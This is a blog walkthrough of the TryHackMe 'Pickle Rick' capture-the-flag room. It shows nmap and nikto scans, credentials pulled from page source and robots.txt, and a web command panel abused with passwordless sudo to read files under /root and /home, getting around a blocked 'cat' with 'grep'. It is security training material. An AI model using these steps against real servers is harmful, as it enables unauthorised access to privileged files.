TryHackme | Pickle Rick Walkthrough

Jon Headley
6 min readJun 10, 2022


A Rick and Morty CTF. Help turn Rick back into a human!

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Pickle Rick is a “Difficulty: Easy”, CTF style TryHackMe room with the objective of finding 3 ingredients needed to turn Rick back into a human. The description in the room doesn’t offer many hints except that we are exploiting a webserver. With only that to go on, let’s start our enumeration!

Let’s start off with basic enumeration to see what we’re dealing with:

nmap -sV -sC -oN init_enum
# -sV: to find service and service version information
# -sC: to run the default nmap LSE scripts
# -oN init_enum: to output to a file for future reference
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b1:56:c4:7c:95:65:2e:d7:76:15:8f:8f:ce:8d:5b:65 (RSA)
| 256 41:f8:e2:bf:37:52:d0:1f:54:c7:e4:db:94:14:6c:a1 (ECDSA)
|_ 256 7d:2d:46:7f:64:5b:a6:fb:d5:4e:ab:d2:ed:c3:be:2a (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
MAC Address: 02:AA:55:C2:13:A1 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We knew from the room description that we were dealing with a webserver, so port 80 being open isn’t surprising. We also see ssh (port 22) is open, but without a username and password that’s not going to take us far. Before we open up the IP address in a browser to view the website, let’s do some further enumeration using nikto:

$ nikto -h http://$ip/
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x426 0x5818ccf125686
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 7 item(s) reported on remote host

Two things that stick out are bolded above. First, it’s interesting that there isn’t any ‘disallow’ entries in the robots.txt. We should always check the robots.txt file during our research, so:

# Since robots.txt is simply a text file, I grabbed the file using
# curl from the command line:
$ curl $ip/robots.txt

This is definitely not a “standard” robots.txt, so let’s make a note of this.

Next, nikto has found a login page (/login.php) for us.

To continue our research let’s load the http://$ip/in a web browser and see what we can find in the source code. I prefer to open up a new tab in my browser by using “ctrl + u”:

The first thing to notice is the “assets” directory. If you navigate to http://<ip>/assets/ you’ll see a list of image, js and css files. The js and css files seem to be standard files and it’s unlikely any hidden data is in the image files. There’s not much to go on here. Further down we can see a helpful little note that Rick left himself…a username!

So far, we’ve discovered a login.php page, a username (“R1ckRul3s”), and a generic text string (“Wubbalubbadubdub”). Using these we successfully login to the “Rick Portal” at /portal.php!

Here we see a “Command Panel” along with some additional tabs at the top. Unfortunately, the other tabs are pages that only the “REAL” rick can see which doesn’t help us. Playing around with the input field by throwing in some common linux commands we find that this input field is some sort of web shell which runs linux commands and outputs to the screen. Let’s input a few commands to see who/where we are:

# I'm running these commands in the input field. I'm typing them
# here for brevity instead of pasting a bunch of pictures.
$ whoami
$ pwd
$ sudo -l # list sudo privileges
Matching Defaults entries for www-data on
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
$ ls -l
total 32
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4096 Feb 10 2019 assets
-rwxr-xr-x 1 ubuntu ubuntu 54 Feb 10 2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1105 Feb 10 2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1062 Feb 10 2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1438 Feb 10 2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2044 Feb 10 2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 robots.txt

GASP…it seems this user can run all commands via sudo WITHOUT a password! So, basically we can do whatever we want! But, we’re just trying to find the 3 ingredients to help Rick turn back into a human as quickly as possible, so let’s just try to find those without doing anything crazy…

If we list the files in the working directory of the “Command Panel” we see two interesting files, Sup3rS3cretPickl3Ingred.txt and clue.txt” Let’s try to use the web shell to print the contents of these files by running cat . Trying cat Sup3rS3cretPickl3Ingred.txt results in the following image:

It looks like the “cat” command is not allowed in our web shell. So, before, we saw that we are in the same directory as the /index.html, so let’s see if we can access these files via curl:

$ curl http://$ip/Sup3rS3cretPickl3Ingred.txt
$ curl http://$ip/clue.txt
Look around the file system for the other ingredient.

Excellent! We found the first flag (sorry, gotta run it yourself to see the answer…)! Also, now we know that we need to look around the file system for the other flags. Let’s see if we can find some files in the /home and /root directories by using “find” in the “Command Panel”:

# Same as before, I'm running this command thru 
# the "Command Panel"
$ sudo find /home /root -type f
/home/rick/second ingredients

Looks like we found /home/rick/second\ ingredients and /root/3rd.txt. But, how do we access them? The webserver won’t allow us to access files in /home and /root directories and the “Command Panel” doesn’t allow the “cat” command. What if we tried “grep”?

# You know the drill...$ sudo grep . "/home/rick/second ingredients”
$ sudo grep . "/root/3rd.txt"

And there we have it! We were able to find all 3 ingredients using various methods. Let’s recap:

  • The web shell didn’t properly sanitize available commands allowing command injection. We were able to print file contents to the screen using this technique.
  • Sensitive information was carelessly left in publicly accessible areas. A username in webpage source-code as a comment and a password left in the robots.txt file. Also, a file containing the first ingredient was accessible.
  • A sudo misconfiguration allowed the web shell “www-data” user to run any command as root without a password. This allowed us to find ingredients in the/root and /home/rick directories.

I’m very glad you’ve taken the time to read my walkthrough. I hope it was helpful for you in discovering new ways to capture flags and test the security of applications. Please leave a comment if you found other avenues for this TryHackMe room!




Jon Headley

From Electrical Engineering to officer in the Air Force to copier salesman to network engineer to python developer to cybersecurity…where will I go next?